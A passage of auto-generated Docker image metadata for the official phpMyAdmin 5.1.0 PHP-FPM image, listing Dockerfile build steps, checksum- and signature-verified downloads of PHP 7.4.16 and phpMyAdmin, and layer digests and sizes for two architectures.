ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 05:50:25 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 06:10:51 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 06:10:51 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 06:10:51 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 06:10:52 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 06:11:05 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 06:11:05 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 06:17:45 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 06:17:46 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 06:17:47 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 06:17:47 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 06:17:47 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 06:17:48 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 06:17:48 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 06:17:48 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 06:17:49 GMT
CMD ["php-fpm"]
# Wed, 31 Mar 2021 17:06:08 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 17:06:08 GMT
ENV MAX_EXECUTION_TIME=600
# Wed, 31 Mar 2021 17:06:09 GMT
ENV MEMORY_LIMIT=512M
# Wed, 31 Mar 2021 17:06:09 GMT
ENV UPLOAD_LIMIT=2048K
# Wed, 31 Mar 2021 17:06:10 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Wed, 31 Mar 2021 17:06:10 GMT
ENV VERSION=5.1.0
# Wed, 31 Mar 2021 17:06:11 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Wed, 31 Mar 2021 17:06:11 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Wed, 31 Mar 2021 17:06:11 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Wed, 31 Mar 2021 17:06:32 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 17:06:33 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Wed, 31 Mar 2021 17:06:33 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Wed, 31 Mar 2021 17:06:33 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Wed, 31 Mar 2021 17:06:34 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:548dde0830bd6b881c0c068db5a4e39aa720d2a0c5ac3897296a023dda7b3391`
Last Modified: Tue, 30 Mar 2021 21:46:41 GMT
Size: 27.8 MB (27788996 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e98b67b2c4467eacf10bfe3c2eef4cb9d9dc040023f3562413a987120aa2b38c`
Last Modified: Wed, 31 Mar 2021 07:32:04 GMT
Size: 228.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:398a2808bbaf89e86620a60aae2b88361cd9f03abd0f3e9b04b43ddf645bbc2e`
Last Modified: Wed, 31 Mar 2021 07:32:39 GMT
Size: 81.2 MB (81230040 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:409fe28765e314abeb61d6d24aeacc128e934cb1bea417f77e92842b06f368ca`
Last Modified: Wed, 31 Mar 2021 07:32:03 GMT
Size: 270.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e1321d1e543a95f500c10fd2d962b71bdbeb025bae6cedd4d31be6d7e43b4f14`
Last Modified: Wed, 31 Mar 2021 07:39:16 GMT
Size: 10.7 MB (10655557 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9645d4e10b074ec4b9844c76680070dc0dee2987c61b33bdc5c318ba081db91a`
Last Modified: Wed, 31 Mar 2021 07:39:11 GMT
Size: 490.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e5e861be914a6b052c85867cd7f9e31f0a394ad36d5ea02fc5a88e6dfeb78d23`
Last Modified: Wed, 31 Mar 2021 07:39:22 GMT
Size: 29.2 MB (29153434 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:39e1aeab3afb9c0a7d850247ca3b592eb09769ff8a5e4e1a0070c48849022400`
Last Modified: Wed, 31 Mar 2021 07:39:11 GMT
Size: 2.3 KB (2270 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9f0c4769162336a241ef03ce19a0e035bad04a12e9dec4ed10a7339f7620cf20`
Last Modified: Wed, 31 Mar 2021 07:39:13 GMT
Size: 248.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:2da6dc26d71175a03303b1657bd85562afaa23041d6dc6584fcb701bec920952`
Last Modified: Wed, 31 Mar 2021 07:39:11 GMT
Size: 8.4 KB (8449 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:372ca6290ddc9b8c238f6364db263015d0f6feaf6604a05986c2c7a0baad8163`
Last Modified: Wed, 31 Mar 2021 17:09:01 GMT
Size: 3.0 MB (3000408 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a3a11cf6f9b0c047d28c6120b03a6e0045345fa0d37d1fe37c3ef184c8172f63`
Last Modified: Wed, 31 Mar 2021 17:09:00 GMT
Size: 549.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a090e1331443d8d9d16209837a8bbd26d739c47d55fd297b3c8679e71631c5cd`
Last Modified: Wed, 31 Mar 2021 17:09:08 GMT
Size: 14.1 MB (14065372 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:96eee92e578cd65cc9a932e0a10e27ebcfef65c976a96653fa98c882f368ce44`
Last Modified: Wed, 31 Mar 2021 17:09:00 GMT
Size: 1.5 KB (1529 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c6e8840ad9723de1323d0faa6e726e1f0e226c959515cbe9ce7d4a598ee10f99`
Last Modified: Wed, 31 Mar 2021 17:09:00 GMT
Size: 772.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `phpmyadmin:fpm` - linux; mips64le
```console
$ docker pull phpmyadmin@sha256:6a7d12633e44a4be97ee48cdbbcc1b508165ed30f1cafb8a9a19bc152263d585
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **142.7 MB (142680028 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:c45bc14b2d756d554e640919c989ddbcf0a29701b9724e47bca3937a5b52be25`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 22:09:47 GMT
ADD file:b5b2f1fc18276a3928a2d904fedc2991239e065051f16680662a22627d15e809 in /
# Tue, 30 Mar 2021 22:09:48 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 00:27:37 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 00:27:37 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 00:28:24 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 00:28:25 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 00:28:27 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 00:54:22 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 00:54:22 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 00:54:23 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 00:54:23 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 01:38:06 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 01:38:06 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 01:38:07 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 01:38:07 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 01:38:29 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 01:38:29 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 01:51:09 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 01:51:10 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 01:51:12 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 01:51:13 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 01:51:13 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 01:51:15 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 01:51:15 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 01:51:15 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 01:51:16 GMT
CMD ["php-fpm"]
# Wed, 31 Mar 2021 13:28:28 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 13:28:28 GMT
ENV MAX_EXECUTION_TIME=600
# Wed, 31 Mar 2021 13:28:29 GMT
ENV MEMORY_LIMIT=512M
# Wed, 31 Mar 2021 13:28:29 GMT
ENV UPLOAD_LIMIT=2048K
# Wed, 31 Mar 2021 13:28:31 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Wed, 31 Mar 2021 13:28:31 GMT
ENV VERSION=5.1.0
# Wed, 31 Mar 2021 13:28:32 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Wed, 31 Mar 2021 13:28:32 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Wed, 31 Mar 2021 13:28:32 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Wed, 31 Mar 2021 13:29:07 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 13:29:08 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Wed, 31 Mar 2021 13:29:09 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Wed, 31 Mar 2021 13:29:09 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Wed, 31 Mar 2021 13:29:09 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:17fa7bb8f5ce4138c383674409fef134204b2ae72f4a997a2cebccad07e8e32b`
Last Modified: Tue, 30 Mar 2021 22:16:21 GMT
Size: 25.8 MB (25806366 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:352cbf73d26a044699ae2f07261cb972fea9bcddf88ba2198123b5deda9e10f4`
Last Modified: Wed, 31 Mar 2021 02:51:35 GMT
Size: 228.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:719d1191368872841cbb21ecc69ac171357d4b1e986c7a460dcb0bc3d060f095`
Last Modified: Wed, 31 Mar 2021 02:52:26 GMT
Size: 61.4 MB (61403934 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:378cc22997f22b69d3ca6ba56580b5d4484b5ce25878d6418a118d57ba4f3901`
Last Modified: Wed, 31 Mar 2021 02:51:33 GMT
Size: 225.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:455d8dadc848c5700ba333cbec67367c629aec69fad1c5b01e9e90eb0ee66295`
Last Modified: Wed, 31 Mar 2021 02:57:41 GMT
Size: 10.7 MB (10653547 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:af62ca65b964ace7379c2f456310ea0c2cdc442e2ca5cde1fb518d83617b6cf5`
Last Modified: Wed, 31 Mar 2021 02:57:35 GMT
Size: 491.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:4196270806704543539f9b562acdc331ae0296e2e15b8b04ac05af4a5c3905d3`
Last Modified: Wed, 31 Mar 2021 02:57:55 GMT
Size: 28.0 MB (27950685 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f379443061bf3e47dc86549f33192e18245dd86df64d2ffbddd07bc8f54bcb89`
Last Modified: Wed, 31 Mar 2021 02:57:35 GMT
Size: 2.3 KB (2268 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f6e9b690e51359d8c3c48b92beb02c2680811256cb510f3330ed4bac535eb041`
Last Modified: Wed, 31 Mar 2021 02:57:35 GMT
Size: 248.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ee649ce0aa8a119be500557d09960ee0272440539858cf02191ea9aa648f3fd7`
Last Modified: Wed, 31 Mar 2021 02:57:35 GMT
Size: 8.4 KB (8446 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e5627b00853990ba5c51a50f8f816d8ec446b45e664bd7763773704449d90b4a`
Last Modified: Wed, 31 Mar 2021 13:30:26 GMT
Size: 2.8 MB (2785447 bytes)
